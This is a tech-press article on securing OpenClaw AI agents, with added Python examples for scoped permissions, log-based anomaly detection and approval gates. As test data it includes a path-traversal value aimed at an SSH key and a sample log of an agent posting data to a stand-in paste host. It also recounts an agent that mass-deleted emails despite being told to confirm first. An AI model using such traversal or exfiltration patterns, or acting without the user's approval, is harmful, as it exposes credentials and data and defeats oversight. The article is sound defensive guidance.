Your OpenClaw agents can empty your inbox and leak your data. Here's how to secure them | TechRadar
Meta’s Director of AI and Safety Alignment wanted to clean up her inbox, so she set up an OpenClaw AI agent and told it to “confirm before acting.” But it didn't. Instead, the OpenClaw agent mass-deleted hundreds of emails while she scrambled to shut it down from another device.
OpenClaw’s adoption has skyrocketed in just a few short months, amassing hundreds of thousands of GitHub stars so far. It’s part of a growing number of frameworks built to make agentic AI possible.
But greater adoption also comes with alarming headlines about unprotected setups leaking passwords, fake add-ons spreading viruses, and poor storage of sensitive information.
The good news is that with the right processes in place, agentic AI can be secure, regardless of the framework you use. Here are 4 best practices worth putting into action before deploying your agents.
OpenClaw requires broad system access to execute shell commands, manage files, and control browsers, creating a large attack surface for security issues. It’s why everyone advises running it on an isolated computer. But doing so limits what your agent can reliably and safely do.
Thankfully, there are alternatives that do not require you to give broad system access. You can build agents through a platform like NemoClaw, which runs them in a sandbox with tightly scoped permissions. Or you could use Docker Sandboxes, which use microVMs rather than plain containers for better security.
During setup, consider what the minimum access for this specific task actually is. An agent summarizing emails needs read access, not write or delete. An agent filing documents needs one folder, not an entire drive.
While it's tempting to give AI broad permissions so it can do more, it also exposes you (and your devices) to significant risk. By following the principle of least privilege, you're still giving the AI the permissions it needs to do the work while minimizing later headaches.
For any OAuth approval the agent requests, verify exactly which permissions you’re granting. Otherwise, you risk giving your agents too much power and access over time.
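The scoping advice above (read-only for the summarizer, one folder for the filer, no surplus OAuth scopes) can be enforced in code rather than left to the agent's judgement. The following is an added example written for this article, not code from OpenClaw or from the author; the scope names, the `AgentPolicy` class, `check_action` and `excess_scopes` are all assumptions, and real OAuth scope strings differ per provider.

```python
"""Least-privilege policy check for agent tool calls (added example, not OpenClaw code)."""
import os
from dataclasses import dataclass

# Scope names here are hypothetical; map them to your provider's real OAuth scopes.
REQUIRED_SCOPE = {
    "mail.list": "mail:read",
    "mail.read": "mail:read",
    "mail.send": "mail:write",
    "mail.delete": "mail:delete",
    "fs.read": "fs:read",
    "fs.write": "fs:write",
    "fs.delete": "fs:delete",
}


@dataclass(frozen=True)
class AgentPolicy:
    """One agent, one task, one deliberately small set of scopes and roots."""
    name: str
    scopes: frozenset              # e.g. frozenset({"mail:read"})
    allowed_roots: tuple = ()      # filesystem roots the agent may touch, if any


def path_allowed(path: str, roots) -> bool:
    """True only if the canonical path lies under an allowed root.

    os.path.realpath collapses '..' and resolves symlinks, so a target such as
    '/srv/docs/../home/user/.ssh/id_rsa' is compared as '/home/user/.ssh/id_rsa'.
    """
    real = os.path.realpath(path)
    for root in roots:
        root_real = os.path.realpath(root)
        if real == root_real or real.startswith(root_real.rstrip(os.sep) + os.sep):
            return True
    return False


def check_action(policy: AgentPolicy, action: str, target: str = ""):
    """Return (allowed, reason). Unknown actions, missing scopes and out-of-root
    paths are all denied; the agent's own reasoning never enters into it."""
    scope = REQUIRED_SCOPE.get(action)
    if scope is None:
        return False, f"unknown action {action!r}"
    if scope not in policy.scopes:
        return False, f"{action} needs {scope}; {policy.name} only has {sorted(policy.scopes)}"
    if action.startswith("fs.") and not path_allowed(target, policy.allowed_roots):
        return False, f"{target} is outside allowed roots {list(policy.allowed_roots)}"
    return True, "ok"


def excess_scopes(requested, needed):
    """Compare the scopes an OAuth consent prompt asks for with what the task
    actually needs; anything returned here is a reason to decline the prompt."""
    return sorted(set(requested) - set(needed))


if __name__ == "__main__":
    # Constructed policies: a read-only mail summarizer and a single-folder filer.
    summarizer = AgentPolicy("summarizer", frozenset({"mail:read"}))
    filer = AgentPolicy("filer", frozenset({"fs:read", "fs:write"}), ("/srv/docs",))
    print(check_action(summarizer, "mail.read"))
    print(check_action(summarizer, "mail.delete"))
    print(check_action(filer, "fs.write", "/srv/docs/2024/report.pdf"))
    print(check_action(filer, "fs.write", "/srv/docs/../home/user/.ssh/id_rsa"))
    print(excess_scopes(["mail.read", "mail.modify", "contacts"], ["mail.read"]))
```

The point of `path_allowed` is that a prefix check on the raw string is not enough: the agent (or a prompt-injected instruction it has read) can hand over a path containing `..` or a symlink that resolves somewhere else, so the comparison has to be done on the canonical path. Note also that `check_action` denies `mail.delete` for the summarizer regardless of what the model decides, which is the structural protection the article argues for later.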
2. Narrow your focus, then expand responsibilities
Before trusting an agent with anything high-stakes, watch how it handles a low-stakes task, such as analyzing logs or drafting an email. If all goes well, give it increasingly ambiguous tasks as a test to see how it responds. Ask it to complete an out-of-scope action or one that requires a permission it doesn’t have.
An effective AI agent will ask follow-up questions before proceeding or can clearly communicate its limits. What you want to avoid is an AI agent with false confidence making an assumption and proceeding, despite not actually knowing the right steps.
An agent that halts and asks on a low-stakes task will probably halt and ask on a high-stakes one. An agent that fills gaps by guessing will do the same when the stakes are real.
That said, remember that these systems are probabilistic, so agents can behave differently in production. A safe assumption is that if something goes wrong in testing, it will 100% happen when running in a live environment; but just because nothing goes wrong during testing doesn’t mean everything is secure.
An agent that’s been running quietly for weeks may have already drifted due to configuration changes, extended OAuth consents, and new permissions acquired through normal operation. Often, it's hard to detect issues because there’s no clear breach.
Have an observability tool in place to monitor for unusual activity, such as rogue tool calls or data transfers outside normal patterns, and set up alerts so you can quickly course-correct if something goes awry. You can also use it to periodically audit your agent’s credentials and actions for anything unusual.
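What "unusual activity" looks like in practice is a handful of concrete rules run over the agent's tool-call log: a tool the agent was never meant to use, an outbound transfer to a host you did not approve, or a burst of destructive calls. The following is an added example, not code from the article or from OpenClaw; the JSON-lines log format, the field names, the allowlists and the thresholds are all assumptions, and the sample log is constructed for the demonstration.

```python
"""Detection rules over an agent's tool-call audit log (added example, not OpenClaw code)."""
import json
from collections import defaultdict
from datetime import datetime
from urllib.parse import urlparse

# Constructed sample log. The format is an assumption, not real OpenClaw output.
SAMPLE_LOG = """\
{"ts":"2025-01-10T09:00:01Z","agent":"inbox-summarizer","tool":"mail.list","args":{"folder":"INBOX"}}
{"ts":"2025-01-10T09:00:02Z","agent":"inbox-summarizer","tool":"mail.read","args":{"id":"m1"}}
{"ts":"2025-01-10T09:00:03Z","agent":"inbox-summarizer","tool":"http.post","args":{"url":"https://api.llm-provider.example/v1/chat","bytes":2100}}
{"ts":"2025-01-10T09:00:04Z","agent":"inbox-summarizer","tool":"http.post","args":{"url":"https://paste.example.net/upload","bytes":48211}}
{"ts":"2025-01-10T09:00:05Z","agent":"inbox-summarizer","tool":"mail.delete","args":{"id":"m2"}}
{"ts":"2025-01-10T09:00:06Z","agent":"inbox-summarizer","tool":"mail.delete","args":{"id":"m3"}}
{"ts":"2025-01-10T09:00:07Z","agent":"inbox-summarizer","tool":"mail.delete","args":{"id":"m4"}}
"""

# Per-agent tool allowlist and egress allowlist: the "normal pattern" to compare against.
ALLOWED_TOOLS = {"inbox-summarizer": {"mail.list", "mail.read", "http.post"}}
ALLOWED_EGRESS_HOSTS = {"api.llm-provider.example"}
DESTRUCTIVE_SUFFIXES = (".delete", ".move")
BURST_THRESHOLD = 3          # destructive calls ...
WINDOW_SECONDS = 60          # ... within this many seconds trips an alert


def parse_log(text: str):
    """Parse JSON lines into events with a real datetime in 'ts'."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        ev["ts"] = datetime.fromisoformat(ev["ts"].replace("Z", "+00:00"))
        events.append(ev)
    return events


def detect(events):
    """Apply three rules and return a list of alert dicts in log order."""
    alerts = []
    recent_destructive = defaultdict(list)   # agent -> timestamps inside the window
    for ev in events:
        agent, tool, args = ev["agent"], ev["tool"], ev.get("args", {})

        # Rule 1: a tool call outside this agent's allowlist.
        if tool not in ALLOWED_TOOLS.get(agent, set()):
            alerts.append({"rule": "unexpected_tool", "agent": agent, "tool": tool, "ts": ev["ts"]})

        # Rule 2: outbound transfer to a host that is not on the egress allowlist.
        if tool.startswith("http."):
            host = urlparse(args.get("url", "")).hostname or ""
            if host not in ALLOWED_EGRESS_HOSTS:
                alerts.append({"rule": "egress_unknown_host", "agent": agent,
                               "host": host, "bytes": args.get("bytes", 0), "ts": ev["ts"]})

        # Rule 3: a burst of destructive calls inside a sliding window.
        if tool.endswith(DESTRUCTIVE_SUFFIXES):
            window = recent_destructive[agent]
            window.append(ev["ts"])
            window[:] = [t for t in window if (ev["ts"] - t).total_seconds() <= WINDOW_SECONDS]
            if len(window) == BURST_THRESHOLD:     # fires when the count reaches the threshold
                alerts.append({"rule": "destructive_burst", "agent": agent,
                               "count": len(window), "ts": ev["ts"]})
    return alerts


def run_sample():
    return detect(parse_log(SAMPLE_LOG))


if __name__ == "__main__":
    for alert in run_sample():
        print(alert)
```

Rule 1 is the cheapest and catches the mail-deleting summarizer immediately: it does not matter why the model decided to delete, only that `mail.delete` was never on its allowlist. Rule 3 is the one that limits blast radius when you did grant a destructive permission, since a human cleaning an inbox and an agent emptying it look different mainly in rate.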
You may have seen online that it's recommended to tell your AI to "confirm before acting" as a safeguard. Unfortunately, it’s too vague to be actionable, so in practice it often leads to inconsistent behavior.
Instead, give the AI agents testable guardrails so you can clearly decide whether they followed instructions. Guidance like "don’t delete, move, or modify any item without displaying a list of planned changes and receiving my explicit approval" is much easier to verify.
The more precisely you define the constraint, the less room there is for misunderstanding.
However, always remember that these systems are probabilistic and a bit of a black box, so there is a chance OpenClaw will ignore instructions at some point. You want to plan for the worst-case scenario when this happens.
If an action could expose an API key, delete emails, or transmit sensitive data, you need to make that outcome structurally impossible.
For example, you should revoke delete permissions at the account level so the agent literally cannot delete anything, regardless of what it decides to do, and store sensitive credentials in a secrets manager the agent has no access to, rather than in any file or environment the agent can read.
Good instructions reduce the likelihood of a mistake, but the right setup minimizes the damage.
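The guardrail quoted above ("display a list of planned changes and receive my explicit approval") is testable precisely because it can be turned into a gate the code enforces, and the structural point ("revoke delete at the account level") is what still holds when the model ignores the instruction. The following is an added example, not code from the article or from OpenClaw; `Action`, `Executor`, the tool names and the approval wording are assumptions, and the plan is constructed.

```python
"""Plan-then-approve gate for mutating agent actions (added example, not OpenClaw code)."""
import hashlib
import json
from dataclasses import dataclass, asdict

# Tools whose effects are not reversible enough to run without a shown, approved plan.
MUTATING = {"mail.delete", "mail.move", "mail.modify", "fs.write", "fs.delete"}


@dataclass(frozen=True)
class Action:
    tool: str
    target: str


def plan_digest(plan) -> str:
    """Stable hash of the exact plan that was displayed, kept as the approval receipt."""
    canonical = json.dumps([asdict(a) for a in plan], sort_keys=True)
    return hashlib.sha256(canonical.encode()).hexdigest()


def render_plan(plan) -> str:
    """The list the user sees before being asked to approve."""
    return "\n".join(f"{i}. {a.tool} {a.target}" for i, a in enumerate(plan, 1))


class Executor:
    """Runs tool calls on the agent's behalf, but only ones that are both
    approved and within its account-level capabilities."""

    def __init__(self, capabilities):
        # Capabilities mirror what the account actually permits. If 'mail.delete'
        # is revoked on the account, it is simply absent here and can never run.
        self.capabilities = frozenset(capabilities)
        self.approved_actions = frozenset()
        self.approval_receipt = None
        self.executed = []

    def approve(self, plan, user_reply: str) -> bool:
        """Record approval only for an explicit 'approve' on the displayed plan."""
        if user_reply.strip().lower() != "approve":
            return False
        self.approved_actions = frozenset(plan)
        self.approval_receipt = plan_digest(plan)
        return True

    def execute(self, action: Action):
        """Return (status, reason). Mutating actions must be in the approved plan;
        every action must be within the executor's capabilities."""
        if action.tool in MUTATING and action not in self.approved_actions:
            return "refused", "mutating action not in an approved plan"
        if action.tool not in self.capabilities:
            return "refused", f"account has no capability {action.tool}"
        self.executed.append(action)
        return "done", ""


def demo():
    """Constructed scenario: the agent plans one move and one delete; delete is
    revoked at the account level so it fails even after approval."""
    plan = [Action("mail.move", "m1 -> Archive"), Action("mail.delete", "m2")]
    ex = Executor(capabilities={"mail.read", "mail.list", "mail.move"})
    before = ex.execute(plan[0])                 # nothing approved yet
    shown = render_plan(plan)
    ex.approve(plan, "approve")
    results = [ex.execute(a) for a in plan]
    drift = ex.execute(Action("mail.move", "m3 -> Trash"))   # not in the plan
    return {"shown": shown, "before": before, "results": results,
            "drift": drift, "executed": ex.executed}


if __name__ == "__main__":
    out = demo()
    print(out["shown"])
    print(out["before"], out["results"], out["drift"], sep="\n")
```

Two things make this verifiable in the way the article asks for. First, approval is tied to a specific rendered plan, so an agent that silently adds an item after the list was shown gets refused on that item. Second, the refusal on `mail.delete` comes from the capability set, not from the approval step: even a user who approves a delete cannot make it happen, which is the "structurally impossible" outcome the previous paragraphs describe.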
Remember that while agents are powerful and quick, they lack human judgment, and most agentic frameworks, like OpenClaw, don’t include security features by default. It's on the people deploying them to build in those safeguards.
Scoped credentials, precise instructions, and frequent monitoring are the minimum viable conditions for deploying an agent that does what you actually want and nothing else.
This article was produced as part of TechRadar Pro's Expert Insights channel, where we feature the best and brightest minds in the technology industry today. The views expressed here are those of the author and are not necessarily those of TechRadar Pro or Future plc. If you are interested in contributing, find out more here: https://www.techradar.com/news/submit-your-story-to-techradar-pro
TechRadar is part of Future US Inc, an international media group and leading digital publisher.
© Future US, Inc. Full 7th Floor, 130 West 42nd Street, New York, NY 10036.